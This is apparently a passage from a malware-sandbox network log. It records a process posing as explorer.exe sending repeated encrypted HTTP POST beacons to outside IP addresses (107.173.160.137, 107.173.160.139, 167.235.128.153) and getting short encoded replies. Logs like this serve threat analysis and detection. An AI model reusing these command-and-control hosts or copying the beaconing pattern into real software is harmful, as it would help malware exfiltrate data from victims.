                                                          2024-07-19 11:45:26 UTC685INData Raw: 6e 64 4a 4a 4f 30 66 6e 4c 44 41 72 5a 57 32 71 43 35 44 46 44 34 71 65 55 44 5a 6f 4d 46 39 6d 66 6e 70 39 7a 65 66 49 43 45 7a 63 76 54 4a 58 4c 76 68 6c 41 6e 68 31 35 66 2f 42 41 30 39 76 36 54 46 72 6b 6c 63 33 6e 41 68 6a 78 36 65 4b 77 73 48 2f 6f 31 2b 6e 56 31 2b 55 4b 45 54 6e 67 2b 73 6d 64 64 63 67 2b 71 33 6d 47 36 68 52 32 75 56 61 74 7a 70 45 33 73 54 41 6a 61 58 38 6d 37 58 55 32 6d 30 37 70 37 55 6f 56 77 74 5a 63 78 7a 57 62 65 37 44 45 65 54 68 75 6a 54 42 61 7a 71 4e 57 56 48 4f 4a 6b 75 69 66 4e 64 33 4f 72 58 45 65 43 6a 4a 38 38 68 31 37 75 6c 73 78 77 65 7a 79 78 55 36 55 30 72 74 53 73 66 6b 71 76 57 78 75 6b 39 32 64 66 4c 68 38 53 63 50 70 75 31 43 6c 50 30 56 36 56 67 39 4f 35 46 41 75 6c 77 4d 31 46 35 6d 35 51 7a 6c 73 6d 67
                                                          Data Ascii: ndJJO0fnLDArZW2qC5DFD4qeUDZoMF9mfnp9zefICEzcvTJXLvhlAnh15f/BA09v6TFrklc3nAhjx6eKwsH/o1+nV1+UKETng+smddcg+q3mG6hR2uVatzpE3sTAjaX8m7XU2m07p7UoVwtZcxzWbe7DEeThujTBazqNWVHOJkuifNd3OrXEeCjJ88h17ulsxwezyxU6U0rtSsfkqvWxuk92dfLh8ScPpu1ClP0V6Vg9O5FAulwM1F5m5Qzlsmg


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.557829107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:27 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:27 UTC1267OUTData Raw: 62 62 35 62 70 4b 32 58 4f 4e 63 46 77 2b 30 69 78 48 6c 74 2f 2b 70 74 59 62 71 58 4b 2f 78 31 62 43 6e 57 6a 41 5a 44 43 48 32 77 66 77 53 56 65 34 57 37 32 5a 57 79 6f 7a 6b 52 6e 52 58 30 36 46 5a 2f 71 44 57 61 2b 33 6b 6e 53 76 56 48 78 42 6f 75 30 6b 42 55 54 6a 42 55 6d 46 59 64 7a 76 6e 41 64 34 4b 38 67 6b 59 4f 53 66 54 61 32 35 6f 51 46 37 56 44 34 6f 30 2b 6a 4c 74 67 73 52 48 35 4c 45 39 52 4b 54 69 59 37 76 68 6d 2b 4b 78 34 56 50 36 2b 61 4e 4d 63 4f 65 33 70 48 79 61 48 53 46 59 64 57 30 56 47 42 74 69 72 63 56 67 41 42 72 37 30 6e 65 4f 30 41 4a 53 78 32 4e 69 38 47 6c 65 7a 71 46 6d 61 6a 58 73 58 75 47 49 48 4a 4b 75 41 48 4c 47 76 49 42 30 69 42 31 4b 50 66 6c 48 59 50 47 49 51 71 5a 78 74 46 42 49 4e 45 58 45 56 38 75 50 59 74 58 51
                                                          Data Ascii: bb5bpK2XONcFw+0ixHlt/+ptYbqXK/x1bCnWjAZDCH2wfwSVe4W72ZWyozkRnRX06FZ/qDWa+3knSvVHxBou0kBUTjBUmFYdzvnAd4K8gkYOSfTa25oQF7VD4o0+jLtgsRH5LE9RKTiY7vhm+Kx4VP6+aNMcOe3pHyaHSFYdW0VGBtircVgABr70neO0AJSx2Ni8GlezqFmajXsXuGIHJKuAHLGvIB0iB1KPflHYPGIQqZxtFBINEXEV8uPYtXQ
                                                          2024-07-19 11:45:28 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:28 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:28 UTC685INData Raw: 67 6e 46 43 5a 4e 38 67 65 6e 36 59 65 5a 38 53 61 68 5a 77 4b 39 2f 6d 30 71 34 58 5a 2b 61 6b 57 31 73 55 47 53 58 55 50 6a 69 35 6a 4b 52 67 78 6d 7a 4e 4e 44 31 70 50 4c 6f 38 79 48 77 55 42 2f 6a 41 61 56 52 75 74 46 4e 53 6b 64 6b 67 5a 68 50 70 68 63 50 35 56 47 45 78 39 71 79 69 39 67 72 30 33 56 49 38 59 30 67 4d 4c 77 47 6c 78 71 75 32 4c 63 6c 4d 46 77 66 65 65 70 64 65 41 6c 6c 67 4b 38 6d 30 67 49 51 38 41 50 2b 66 47 52 53 39 35 66 70 75 51 31 34 56 41 52 42 38 78 4a 54 63 75 41 67 6b 78 6c 30 5a 63 55 4c 74 48 2b 6c 7a 43 72 37 58 51 43 54 6c 55 74 59 55 7a 38 36 57 44 79 57 4d 2b 6b 52 65 69 6d 79 64 6d 32 4e 77 57 6e 4d 76 68 31 49 2b 52 45 4d 57 76 49 58 7a 36 59 6c 30 61 4a 34 50 67 2f 49 37 7a 5a 45 61 39 65 72 2b 42 48 72 65 2f 65 39
                                                          Data Ascii: gnFCZN8gen6YeZ8SahZwK9/m0q4XZ+akW1sUGSXUPji5jKRgxmzNND1pPLo8yHwUB/jAaVRutFNSkdkgZhPphcP5VGEx9qyi9gr03VI8Y0gMLwGlxqu2LclMFwfeepdeAllgK8m0gIQ8AP+fGRS95fpuQ14VARB8xJTcuAgkxl0ZcULtH+lzCr7XQCTlUtYUz86WDyWM+kReimydm2NwWnMvh1I+REMWvIXz6Yl0aJ4Pg/I7zZEa9er+BHre/e9


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.557830107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:29 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:29 UTC1122OUTData Raw: 66 6d 64 74 76 48 72 34 50 51 57 77 61 39 71 54 65 54 74 68 2b 4f 49 48 4f 77 78 4e 65 67 38 4c 36 5a 4c 7a 50 72 63 63 32 76 50 67 64 72 67 43 66 39 6b 75 42 6c 64 54 4c 33 36 5a 35 61 50 41 52 2b 32 65 48 6c 74 50 73 39 2b 71 62 4c 32 46 4d 6f 31 58 70 44 63 6c 45 48 51 32 70 41 78 74 39 5a 67 77 63 50 6f 6c 2b 33 52 5a 32 31 5a 79 64 49 61 50 43 41 4b 68 6b 55 69 4b 65 5a 6d 6f 4b 73 76 6c 44 63 6c 2f 76 61 4f 34 44 42 64 57 59 38 50 35 6b 47 77 76 77 64 65 42 75 6d 5a 69 44 63 75 73 62 67 53 36 56 52 6f 70 41 4b 2b 39 54 30 54 30 38 33 57 49 4e 63 44 43 5a 51 62 30 50 50 49 4c 68 4a 68 6a 71 57 36 69 44 71 48 71 49 31 33 62 41 4b 39 78 33 56 44 54 37 31 45 79 58 36 47 61 33 6c 42 70 7a 48 77 78 33 36 54 4a 6a 34 6f 44 44 4f 56 6e 69 37 54 6b 58 4a 71
                                                          Data Ascii: fmdtvHr4PQWwa9qTeTth+OIHOwxNeg8L6ZLzPrcc2vPgdrgCf9kuBldTL36Z5aPAR+2eHltPs9+qbL2FMo1XpDclEHQ2pAxt9ZgwcPol+3RZ21ZydIaPCAKhkUiKeZmoKsvlDcl/vaO4DBdWY8P5kGwvwdeBumZiDcusbgS6VRopAK+9T0T083WINcDCZQb0PPILhJhjqW6iDqHqI13bAK9x3VDT71EyX6Ga3lBpzHwx36TJj4oDDOVni7TkXJq
                                                          2024-07-19 11:45:31 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:30 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:31 UTC685INData Raw: 76 4a 4a 4c 62 58 61 38 64 57 50 7a 41 39 58 69 6f 36 5a 65 61 32 33 58 79 38 67 4d 6a 65 74 44 72 53 6a 72 34 42 37 50 4e 67 6a 62 5a 69 31 5a 32 46 48 4a 76 6a 7a 41 2f 2b 78 67 33 73 61 7a 4a 4a 58 4f 38 77 65 39 4a 6a 4e 57 2b 7a 75 51 36 6d 57 69 54 59 56 45 49 7a 61 5a 58 36 41 39 35 2f 47 73 61 77 35 30 6e 7a 66 52 54 36 30 35 38 61 2f 52 72 73 56 41 35 71 6e 78 4b 36 77 75 79 63 39 79 45 41 75 49 79 70 4f 59 71 39 30 64 36 72 6b 76 43 4b 35 33 31 35 66 76 59 47 77 52 61 4d 49 50 4e 4b 33 48 73 4a 5a 74 54 68 62 33 63 6e 76 49 49 41 55 79 35 43 70 53 44 76 39 66 49 54 55 74 58 7a 75 33 42 4f 44 44 59 75 2b 5a 63 57 4c 63 37 68 4c 39 49 36 59 4a 71 55 43 37 4c 66 43 57 33 5a 4f 65 50 70 31 39 6a 45 69 75 75 33 4b 70 49 37 64 34 50 48 67 37 44 51 4f
                                                          Data Ascii: vJJLbXa8dWPzA9Xio6Zea23Xy8gMjetDrSjr4B7PNgjbZi1Z2FHJvjzA/+xg3sazJJXO8we9JjNW+zuQ6mWiTYVEIzaZX6A95/Gsaw50nzfRT6058a/RrsVA5qnxK6wuyc9yEAuIypOYq90d6rkvCK5315fvYGwRaMIPNK3HsJZtThb3cnvIIAUy5CpSDv9fITUtXzu3BODDYu+ZcWLc7hL9I6YJqUC7LfCW3ZOePp19jEiuu3KpI7d4PHg7DQO


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.557832167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:31 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:31 UTC1122OUTData Raw: 4d 4e 72 79 2f 50 70 39 32 51 79 4c 52 51 58 5a 31 78 47 58 42 75 51 6b 50 59 37 4b 41 6a 50 56 43 5a 77 43 6c 4c 53 74 57 45 42 55 72 6a 38 64 52 34 48 65 36 47 55 72 4c 71 66 35 33 43 71 78 48 2f 30 61 48 58 70 33 6f 52 74 6f 33 6c 4e 38 49 67 2b 31 64 58 56 51 45 41 55 79 49 4e 6b 31 44 79 4e 64 54 79 47 4c 74 49 52 43 4e 42 31 68 6d 5a 6a 36 2b 64 42 65 76 59 6b 38 53 42 42 2f 39 63 41 57 58 44 75 6a 4f 54 54 2f 45 79 54 4d 45 6c 55 32 50 78 6d 48 4c 78 58 73 4b 4e 4b 6f 34 30 6b 44 64 65 6a 5a 4a 49 59 6b 49 43 71 7a 54 6d 45 53 63 74 61 4a 78 47 71 76 33 70 41 58 6b 54 50 77 68 6c 41 76 31 6d 52 50 55 62 4a 4d 4e 4f 4c 38 64 61 4d 39 78 4a 45 78 4e 2b 44 36 4f 4c 72 5a 77 50 32 77 2b 68 36 30 67 59 52 58 49 53 66 46 64 68 50 76 6e 30 7a 6e 64 55 30
                                                          Data Ascii: MNry/Pp92QyLRQXZ1xGXBuQkPY7KAjPVCZwClLStWEBUrj8dR4He6GUrLqf53CqxH/0aHXp3oRto3lN8Ig+1dXVQEAUyINk1DyNdTyGLtIRCNB1hmZj6+dBevYk8SBB/9cAWXDujOTT/EyTMElU2PxmHLxXsKNKo40kDdejZJIYkICqzTmESctaJxGqv3pAXkTPwhlAv1mRPUbJMNOL8daM9xJExN+D6OLrZwP2w+h60gYRXISfFdhPvn0zndU0
                                                          2024-07-19 11:45:32 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:32 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:32 UTC685INData Raw: 5a 4f 53 41 58 35 4c 41 43 76 32 36 6e 70 71 7a 58 77 49 65 55 42 47 46 49 7a 67 62 50 51 52 51 65 32 65 76 4b 4c 49 68 4e 37 41 30 64 42 34 2f 2f 66 2f 72 49 42 59 37 72 67 4f 55 6d 48 7a 6f 4e 64 4a 66 4c 51 61 69 68 69 42 6e 75 34 77 4c 65 58 31 35 35 50 55 63 46 6a 69 56 44 69 68 72 46 46 38 51 58 39 58 6c 78 53 4f 53 66 34 44 41 72 53 58 68 4a 68 56 6d 53 61 6a 45 43 30 64 4a 57 44 63 32 75 64 4d 71 42 35 47 77 37 57 64 2b 2b 34 37 58 71 76 6a 35 78 39 73 48 36 65 58 6b 79 67 31 69 6f 49 75 67 69 35 43 68 79 52 65 65 34 43 6b 46 6a 62 67 61 62 63 38 2f 45 45 69 65 6b 77 77 31 74 57 76 61 4a 35 59 6e 72 42 77 39 6d 67 66 59 67 76 67 67 66 4f 59 30 62 6c 30 48 7a 6d 4d 73 49 49 69 5a 38 6f 6b 45 73 65 67 31 79 5a 6a 72 33 73 37 49 42 5a 70 56 39 59 66
                                                          Data Ascii: ZOSAX5LACv26npqzXwIeUBGFIzgbPQRQe2evKLIhN7A0dB4//f/rIBY7rgOUmHzoNdJfLQaihiBnu4wLeX155PUcFjiVDihrFF8QX9XlxSOSf4DArSXhJhVmSajEC0dJWDc2udMqB5Gw7Wd++47Xqvj5x9sH6eXkyg1ioIugi5ChyRee4CkFjbgabc8/EEiekww1tWvaJ5YnrBw9mgfYgvggfOY0bl0HzmMsIIiZ8okEseg1yZjr3s7IBZpV9Yf


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.557833107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:33 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:33 UTC1122OUTData Raw: 48 4b 64 32 33 69 35 75 6c 56 6f 75 4c 72 54 7a 6f 6d 5a 4c 50 37 2f 4d 67 6f 6c 47 70 36 69 30 4d 6e 50 6b 4e 59 74 48 31 73 7a 72 51 6b 6d 33 59 43 7a 63 62 39 7a 62 58 59 52 4a 4a 31 54 35 54 74 2f 70 67 6b 54 2b 65 69 5a 74 67 2f 57 50 66 62 77 48 4c 51 55 77 36 4b 37 53 78 58 61 65 42 6e 30 58 69 76 69 6d 62 31 50 50 78 72 59 78 6c 52 4d 6e 57 70 50 2b 4f 70 71 6e 68 38 55 73 32 6b 4b 4b 4a 6f 53 6a 48 39 6d 50 42 68 71 55 76 36 4a 6c 6f 4e 6b 31 6f 4a 78 41 67 31 30 63 41 44 6d 59 53 4f 4f 42 6f 79 62 62 31 5a 4f 6d 77 39 78 5a 72 53 31 4d 63 41 7a 50 58 2f 42 78 4f 68 50 53 31 53 36 4b 51 43 66 71 31 47 54 7a 7a 6e 6f 67 50 33 65 6f 5a 71 51 6a 6d 64 76 65 55 34 65 7a 70 4d 65 35 7a 72 32 6c 63 2f 6d 6a 33 77 61 52 67 47 57 2b 7a 69 67 71 6e 65 4a
                                                          Data Ascii: HKd23i5ulVouLrTzomZLP7/MgolGp6i0MnPkNYtH1szrQkm3YCzcb9zbXYRJJ1T5Tt/pgkT+eiZtg/WPfbwHLQUw6K7SxXaeBn0Xivimb1PPxrYxlRMnWpP+Opqnh8Us2kKKJoSjH9mPBhqUv6JloNk1oJxAg10cADmYSOOBoybb1ZOmw9xZrS1McAzPX/BxOhPS1S6KQCfq1GTzznogP3eoZqQjmdveU4ezpMe5zr2lc/mj3waRgGW+zigqneJ
                                                          2024-07-19 11:45:34 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:34 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:34 UTC685INData Raw: 61 59 48 31 69 56 32 55 50 6f 57 38 4b 31 63 42 6d 57 56 41 51 79 34 43 44 58 69 69 64 2b 62 36 38 6c 36 49 51 4a 4c 37 51 5a 4a 74 67 69 32 4c 6a 65 48 49 43 4d 74 2f 57 63 59 64 51 38 4f 6e 37 39 72 56 56 67 50 79 61 6a 52 77 78 54 32 6d 64 31 2b 37 4e 46 76 56 43 7a 67 46 45 6a 30 35 72 48 65 6f 4d 35 2f 52 4d 4f 41 34 61 66 58 59 4d 62 41 41 56 75 77 67 64 52 66 75 41 54 5a 77 6d 5a 52 44 4c 77 6c 47 59 63 37 5a 4e 6e 58 73 57 43 73 63 63 6d 33 4f 53 33 79 72 69 4c 63 79 55 66 59 4d 77 52 67 62 69 6c 64 78 74 6b 6d 2f 74 4d 73 72 66 48 65 69 4e 53 64 2b 6d 5a 74 43 59 50 51 41 45 4e 4b 7a 4a 31 4c 75 63 74 69 37 49 53 65 53 30 41 51 31 6f 4a 6e 77 4e 62 67 2f 48 4d 4f 30 6c 79 30 6b 77 33 76 74 42 33 66 6e 6b 64 62 36 37 62 63 69 45 38 7a 39 44 57 56
                                                          Data Ascii: aYH1iV2UPoW8K1cBmWVAQy4CDXiid+b68l6IQJL7QZJtgi2LjeHICMt/WcYdQ8On79rVVgPyajRwxT2md1+7NFvVCzgFEj05rHeoM5/RMOA4afXYMbAAVuwgdRfuATZwmZRDLwlGYc7ZNnXsWCsccm3OS3yriLcyUfYMwRgbildxtkm/tMsrfHeiNSd+mZtCYPQAENKzJ1Lucti7ISeS0AQ1oJnwNbg/HMO0ly0kw3vtB3fnkdb67bciE8z9DWV


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.557834107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:35 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:35 UTC1122OUTData Raw: 56 4e 4d 39 46 79 30 61 52 50 6b 6e 54 32 79 57 31 4e 4b 4c 57 4b 63 4c 67 48 57 32 6b 35 6d 47 47 51 47 72 73 56 4d 69 35 51 51 73 59 63 67 6b 43 36 30 7a 41 46 30 7a 4c 33 43 54 44 45 38 54 5a 45 79 45 6a 72 6d 6e 6c 77 39 6f 51 53 66 58 49 59 2b 45 6f 41 39 76 37 52 45 6a 6e 6e 6f 2f 71 49 5a 45 46 73 34 67 6c 42 58 33 66 4f 4e 79 7a 6e 61 74 48 61 33 52 75 62 78 71 49 4e 76 4d 59 6f 7a 4a 77 2f 7a 46 45 4e 76 49 6a 6f 4a 2b 44 47 36 4f 58 63 6b 59 50 67 56 4b 67 65 4b 50 51 79 42 34 6d 43 30 43 74 42 56 46 77 56 78 44 56 75 47 76 34 31 65 2f 71 45 78 5a 48 47 4b 7a 35 69 52 2b 53 7a 4d 50 63 52 4f 55 49 6f 73 6e 31 44 57 72 6a 4a 51 39 37 69 47 4f 47 34 41 45 50 44 46 43 44 5a 61 69 61 6d 47 6e 31 79 2b 6c 37 44 4a 70 42 5a 4e 38 51 74 52 78 2b 45 73
                                                          Data Ascii: VNM9Fy0aRPknT2yW1NKLWKcLgHW2k5mGGQGrsVMi5QQsYcgkC60zAF0zL3CTDE8TZEyEjrmnlw9oQSfXIY+EoA9v7REjnno/qIZEFs4glBX3fONyznatHa3RubxqINvMYozJw/zFENvIjoJ+DG6OXckYPgVKgeKPQyB4mC0CtBVFwVxDVuGv41e/qExZHGKz5iR+SzMPcROUIosn1DWrjJQ97iGOG4AEPDFCDZaiamGn1y+l7DJpBZN8QtRx+Es
                                                          2024-07-19 11:45:37 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:37 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:37 UTC685INData Raw: 5a 52 32 39 35 4b 73 6c 79 39 7a 34 34 4e 74 37 62 63 39 65 4c 30 76 49 4c 78 4e 67 72 79 74 68 6b 4c 30 74 35 34 66 50 6e 42 31 6d 70 77 42 49 53 67 62 48 42 56 33 55 42 72 71 67 55 53 62 71 4b 6f 6f 6c 52 38 37 47 50 79 6f 5a 2b 43 70 74 38 77 41 36 50 42 47 76 31 72 67 71 39 51 72 66 4f 2f 35 77 35 6f 4c 5a 77 56 69 79 5a 69 33 76 4b 70 47 6b 39 39 41 4d 71 53 76 6d 42 76 4e 7a 65 34 2b 42 44 5a 37 42 42 30 71 73 55 4c 55 2b 6b 4f 44 57 61 6d 36 4e 41 78 49 6e 45 73 2f 38 55 34 2b 6e 57 34 66 58 64 53 6b 67 6b 39 4d 50 76 6d 72 4d 54 4d 64 5a 6d 55 61 72 67 77 74 30 52 4e 52 6d 34 31 43 39 61 46 58 61 32 67 51 61 65 6a 44 45 77 38 78 78 48 77 6a 45 55 58 65 77 55 46 58 63 45 50 64 4f 73 63 71 6c 79 67 4c 72 76 32 37 32 70 57 4a 51 4c 64 4c 49 45 6e 74
                                                          Data Ascii: ZR295Ksly9z44Nt7bc9eL0vILxNgrythkL0t54fPnB1mpwBISgbHBV3UBrqgUSbqKoolR87GPyoZ+Cpt8wA6PBGv1rgq9QrfO/5w5oLZwViyZi3vKpGk99AMqSvmBvNze4+BDZ7BB0qsULU+kODWam6NAxInEs/8U4+nW4fXdSkgk9MPvmrMTMdZmUargwt0RNRm41C9aFXa2gQaejDEw8xxHwjEUXewUFXcEPdOscqlygLrv272pWJQLdLIEnt


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.557836167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:37 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:45:37 UTC1267OUTData Raw: 42 63 4a 43 61 47 72 6f 6d 2b 4e 53 5a 50 68 36 41 79 78 4d 53 35 48 43 72 78 5a 4e 43 59 53 66 65 33 2b 4d 70 2b 52 64 4e 4e 39 39 4b 34 6d 4f 6f 54 6b 49 4c 33 53 79 4b 51 4d 47 4d 76 57 5a 45 57 34 4a 4a 78 74 31 59 5a 64 43 2f 4a 4c 6c 4f 35 5a 73 4f 4d 31 32 5a 46 64 63 6e 44 33 72 55 4f 4b 72 35 4e 4b 55 32 77 43 2b 51 54 79 59 6b 42 41 4d 62 52 6c 65 31 71 37 57 6d 47 7a 43 5a 70 4a 67 48 53 68 44 42 45 50 6f 74 31 52 61 69 50 30 33 62 2f 68 77 67 52 53 34 50 48 37 35 41 51 52 79 74 6f 6e 35 54 47 73 33 63 55 75 73 64 39 77 7a 42 70 32 51 6e 4f 2f 33 47 69 4d 74 31 4a 45 71 52 62 32 2f 35 4b 4c 41 55 61 6d 68 2f 6a 52 51 59 38 44 38 38 67 4b 43 73 4d 78 6e 76 69 74 73 6d 4c 49 67 4e 59 57 30 4f 42 6c 50 56 48 4f 70 33 51 59 54 37 32 43 61 45 4f 43
                                                          Data Ascii: BcJCaGrom+NSZPh6AyxMS5HCrxZNCYSfe3+Mp+RdNN99K4mOoTkIL3SyKQMGMvWZEW4JJxt1YZdC/JLlO5ZsOM12ZFdcnD3rUOKr5NKU2wC+QTyYkBAMbRle1q7WmGzCZpJgHShDBEPot1RaiP03b/hwgRS4PH75AQRyton5TGs3cUusd9wzBp2QnO/3GiMt1JEqRb2/5KLAUamh/jRQY8D88gKCsMxnvitsmLIgNYW0OBlPVHOp3QYT72CaEOC
                                                          2024-07-19 11:45:38 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:38 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:45:38 UTC685INData Raw: 63 4e 52 71 6c 71 47 61 2f 46 67 4c 55 49 41 64 4e 6f 59 58 68 7a 30 62 33 42 75 51 74 55 75 78 6a 63 53 58 69 38 73 4e 72 76 52 53 74 4e 4c 74 6b 4e 6d 41 38 52 76 45 56 36 52 49 2f 4b 44 77 43 41 2f 59 5a 53 32 62 47 70 5a 2b 71 68 6e 36 4d 79 62 41 4e 47 61 42 6a 6d 65 2b 42 47 49 61 41 64 66 6d 58 4b 48 53 70 61 35 55 38 58 44 64 36 51 73 49 4a 55 35 45 44 6b 72 38 32 6c 6e 43 66 2f 2f 53 79 49 4d 46 72 4a 4d 6c 45 62 4f 5a 5a 77 56 37 68 55 52 72 67 5a 32 2f 73 6b 43 53 6b 56 58 73 42 6e 36 63 71 4a 70 49 41 4e 2f 70 58 38 48 2f 78 4e 50 43 67 41 4f 38 48 61 74 42 77 4b 66 4f 67 43 7a 31 74 32 38 33 32 6d 47 48 2f 54 6d 47 4f 31 58 38 46 35 63 33 48 32 79 36 62 69 6f 6e 45 46 6c 33 79 38 43 73 37 79 63 4a 34 54 65 58 47 34 4e 47 36 59 70 37 75 53 6a
                                                          Data Ascii: cNRqlqGa/FgLUIAdNoYXhz0b3BuQtUuxjcSXi8sNrvRStNLtkNmA8RvEV6RI/KDwCA/YZS2bGpZ+qhn6MybANGaBjme+BGIaAdfmXKHSpa5U8XDd6QsIJU5EDkr82lnCf//SyIMFrJMlEbOZZwV7hURrgZ2/skCSkVXsBn6cqJpIAN/pX8H/xNPCgAO8HatBwKfOgCz1t2832mGH/TmGO1X8F5c3H2y6bionEFl3y8Cs7ycJ4TeXG4NG6Yp7uSj


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.557837107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:45:39 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:45:39 UTC1122OUTData Raw: 6e 61 67 50 5a 61 36 33 43 35 43 44 6a 52 45 71 38 7a 65 79 67 56 32 37 6c 58 48 52 79 4c 48 70 66 55 79 4d 52 30 59 76 4b 7a 52 56 77 2b 30 6d 68 53 33 62 61 64 51 71 41 65 39 53 59 6f 41 61 49 32 55 4c 4c 6e 68 4f 42 68 2b 2b 31 78 7a 72 59 51 43 5a 31 69 5a 31 41 44 32 56 42 57 31 73 6e 42 78 6c 35 43 6b 4b 6e 76 6f 36 6e 6d 47 74 6a 74 62 6b 44 4a 74 45 74 4e 64 59 53 68 43 71 4d 4f 2f 55 70 55 67 77 43 77 4d 67 57 53 30 47 64 63 51 6c 4e 42 43 6b 63 54 50 57 59 78 30 73 39 47 4f 71 72 70 62 76 71 45 64 63 2b 64 7a 53 71 55 63 36 68 57 54 37 2b 30 4d 52 42 37 4a 6c 4c 49 6e 37 74 39 6e 44 46 45 6a 43 61 68 41 67 59 31 77 44 72 2f 5a 4e 68 41 65 63 37 35 64 65 32 32 6f 57 58 31 53 6f 74 4c 35 78 30 6c 4f 2f 5a 6e 59 6f 39 71 57 59 67 52 70 49 37 4d 6a
                                                          Data Ascii: nagPZa63C5CDjREq8zeygV27lXHRyLHpfUyMR0YvKzRVw+0mhS3badQqAe9SYoAaI2ULLnhOBh++1xzrYQCZ1iZ1AD2VBW1snBxl5CkKnvo6nmGtjtbkDJtEtNdYShCqMO/UpUgwCwMgWS0GdcQlNBCkcTPWYx0s9GOqrpbvqEdc+dzSqUc6hWT7+0MRB7JlLIn7t9nDFEjCahAgY1wDr/ZNhAec75de22oWX1SotL5x0lO/ZnYo9qWYgRpI7Mj
                                                          2024-07-19 11:45:40 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:45:40 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
